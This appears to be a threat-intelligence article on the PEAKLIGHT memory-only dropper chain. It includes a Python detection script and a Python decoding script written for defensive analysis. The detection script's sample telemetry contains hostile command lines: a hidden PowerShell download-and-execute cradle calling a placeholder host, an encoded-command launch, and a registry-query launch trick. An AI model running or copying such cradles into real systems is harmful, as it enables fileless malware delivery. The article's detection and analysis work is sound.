Mandiant researchers have detailed a new memory-only dropper used in a multi-stage malware infection chain. The dropper decodes and runs a PowerShell-based downloader, dubbed PEAKLIGHT, which in turn fetches further malware.
Because the dropper stage never touches disk and the chain layers several obfuscation techniques, file-based detection alone is unlikely to catch it.
From Pirated Movies to Malicious Payloads
The infection begins when a user downloads what appears to be a pirated movie but is in fact a ZIP archive containing a Windows shortcut (LNK) file, which kicks off the infection when opened.
The LNK file launches a PowerShell command that downloads additional malicious content from a remote server. According to Mandiant's analysis, this stage comes in two variations, both of which rely on trusted Windows components rather than dropping an attacker-supplied executable:
- Using legitimate system binaries to download and execute the payload
- Using registry queries to achieve the same download-and-execute step
Once the initial foothold is established, a JavaScript-based dropper that exists only in memory decodes and executes the final stage: the PEAKLIGHT PowerShell downloader. PEAKLIGHT itself has several variations, each with distinct characteristics but a common objective: to download additional malicious files from a content delivery network (CDN).
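The chain above is mostly visible in process-creation telemetry: a shortcut under explorer.exe (or a trusted intermediary binary) spawning PowerShell with a hidden window and a download-and-execute cradle. The following Python is an added example written for this page, not code from the Mandiant report; the regexes, the list of launcher binaries and the sample events are assumptions constructed to illustrate the detection logic, and the domains are placeholders.

```python
"""Flag process-creation events that look like the LNK -> PowerShell download chain."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # process that spawned the new one (explorer.exe for a clicked LNK)
    image: str          # the newly created process
    command_line: str


# Assumed list of trusted Windows binaries often used as an intermediary launcher for
# PowerShell. The report describes the technique; these specific names are an assumption.
LAUNCHER_BINARIES = {"cmd.exe", "mshta.exe", "forfiles.exe", "wscript.exe", "cscript.exe"}

# Flags that hide the console window or skip execution-policy checks
STEALTH_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-(?:enc|encodedcommand)\s", re.I)
# A download API paired with an in-memory execution primitive is a download cradle
DOWNLOAD_API = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod", re.I)
EXEC_API = re.compile(r"\biex\b|invoke-expression", re.I)
# Registry query that references PowerShell (the second LNK variation described above)
REG_QUERY = re.compile(r"\breg(?:\.exe)?\s+query\b", re.I)


def analyse(ev: ProcEvent) -> list[str]:
    """Return the suspicious traits found in one event (empty list = nothing flagged)."""
    reasons = []
    cl = ev.command_line
    is_ps = ev.image.lower() in ("powershell.exe", "pwsh.exe")
    if is_ps and STEALTH_FLAGS.search(cl):
        reasons.append("powershell launched hidden or with policy bypass")
    if is_ps and DOWNLOAD_API.search(cl) and EXEC_API.search(cl):
        reasons.append("download-and-execute cradle (payload never written to disk)")
    if is_ps and ev.parent_image.lower() in LAUNCHER_BINARIES:
        reasons.append(f"powershell spawned via trusted binary {ev.parent_image}")
    if REG_QUERY.search(cl) and re.search(r"powershell", cl, re.I):
        reasons.append("registry query referencing PowerShell")
    return reasons


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> reasons, keeping only events that triggered at least one rule."""
    return {i: r for i, ev in enumerate(events) if (r := analyse(ev))}


# Constructed sample telemetry (not real events from the report); domains are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iex (New-Object Net.WebClient)'
              '.DownloadString(\'http://cdn.example.invalid/stage2\')"'),
    ProcEvent("mshta.exe", "powershell.exe",
              "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent("explorer.exe", "cmd.exe",
              'cmd.exe /c for /f "tokens=*" %i in (\'reg query '
              'HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell /v Path\') do %i -w hidden'),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
    ProcEvent("svchost.exe", "powershell.exe",
              "powershell.exe Invoke-WebRequest https://updates.example.invalid/patch.msi -OutFile C:\\Temp\\patch.msi"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line[:60], reasons)
```

The last two sample events are deliberately benign (an admin script and a download with no in-memory execution) to show that the cradle rule needs both a download API and an execution primitive; a rule on Invoke-WebRequest alone would be too noisy. In production the same logic would run over Sysmon event ID 1 or Windows 4688 records, which carry exactly these three fields.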
PEAKLIGHT Variants
PEAKLIGHT checks hard-coded file paths for specific ZIP archives and, if they are absent, downloads them from a content delivery network (CDN). Payloads observed being delivered this way include LUMMAC.V2, SHADOWLADDER and CRYPTBOT.
The variations differ in their target directories, execution logic and the names of the files they download. All of them use layered obfuscation, including hexadecimal and Base64 encoding, to hide the true nature of their payloads.
PEAKLIGHT Variation 1:
- Downloads files to the AppData directory
- Executes files based on their names
- Downloads a decoy video file to mask activity
PEAKLIGHT Variation 2:
- Targets the ProgramData directory
- Executes files based on discovery order
PEAKLIGHT Variation 3:
- Retrieves payloads from a different domain
- Drops additional malicious files, including AutoIt binaries
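Because the variations hide their strings behind hexadecimal and Base64 layers, the first step in analysing a captured stage is to peel those layers off until readable PowerShell remains. The script below is an added example for this page, not code from the report or from the malware: the inner script, the layering order (UTF-16LE, then Base64, then hex) and the placeholder domain are assumptions chosen to mirror the behaviour described above, and the decoder itself is generic rather than tied to any PEAKLIGHT sample.

```python
"""Peel hexadecimal and Base64 layers from an obfuscated PowerShell stage."""
import base64
import binascii
import re

HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed inner script, assumed for this example: check a hard-coded ZIP path and
# fetch it from a placeholder CDN if it is missing, as the variants above do.
INNER_SCRIPT = ("$p = Join-Path $env:ProgramData 'video.zip'; "
                "if (-not (Test-Path $p)) { Invoke-WebRequest 'http://cdn.example.invalid/video.zip' -OutFile $p }")


def build_sample() -> bytes:
    """Obfuscate INNER_SCRIPT the way -EncodedCommand payloads are built, then hex-wrap it."""
    utf16 = INNER_SCRIPT.encode("utf-16-le")      # PowerShell expects UTF-16LE before Base64
    b64 = base64.b64encode(utf16)
    return b64.hex().encode()                     # outer hexadecimal layer


def peel_layer(data: bytes):
    """Remove one encoding layer; return (kind, decoded) or None if data is not encoded."""
    try:
        s = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    s = "".join(s.split())                        # tolerate line breaks and spaces in blobs
    if HEX_RE.match(s):
        return "hex", bytes.fromhex(s)
    if B64_RE.match(s) and len(s) % 4 == 0:
        try:
            return "base64", base64.b64decode(s, validate=True)
        except binascii.Error:
            return None
    return None


def peel_all(data: bytes, max_layers: int = 8):
    """Strip layers until plain text remains; returns (list of layer kinds, final bytes)."""
    layers, cur = [], data
    for _ in range(max_layers):
        result = peel_layer(cur)
        if result is None:
            break
        kind, cur = result
        # UTF-16LE text shows up as every second byte being NUL; normalise it to UTF-8
        if kind == "base64" and len(cur) >= 2 and len(cur) % 2 == 0 and cur[1:2] == b"\x00":
            cur = cur.decode("utf-16-le").encode()
            kind = "base64/utf16le"
        layers.append(kind)
    return layers, cur


if __name__ == "__main__":
    kinds, plain = peel_all(build_sample())
    print(kinds)
    print(plain.decode())
```

The hex test runs before the Base64 test because every hex string is also a syntactically valid Base64 alphabet string, while the reverse is rarely true. The one ambiguity left is a final plaintext that happens to consist only of Base64 characters (a single bare word, for instance); in practice the decoded PowerShell contains `$`, quotes or spaces and so stops the loop, but an analyst should still eyeball the last layer rather than trust the count blindly.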
Protecting Against PEAKLIGHT
To mitigate PEAKLIGHT threats, the researchers recommend the following actions:
- Scan your environment for the published indicators of compromise (IOCs) and run the accompanying YARA rules.
- Maintain updated security software to detect and block malicious activities.
- Be cautious of suspicious emails and attachments, especially those promising pirated content.
- Practice safe browsing habits and avoid clicking on unknown links.
The discovery of PEAKLIGHT is a strong example of how effective memory-only staging is at evading file-based detection, of how readily malicious payloads spread through seemingly harmless pirated content, and of the abuse of trusted system processes. Note, though, that only the dropper stage is memory-only: the lure ZIP, the LNK file and the payloads written to AppData or ProgramData all touch disk, and the PowerShell stages remain visible to script block logging and process-creation telemetry.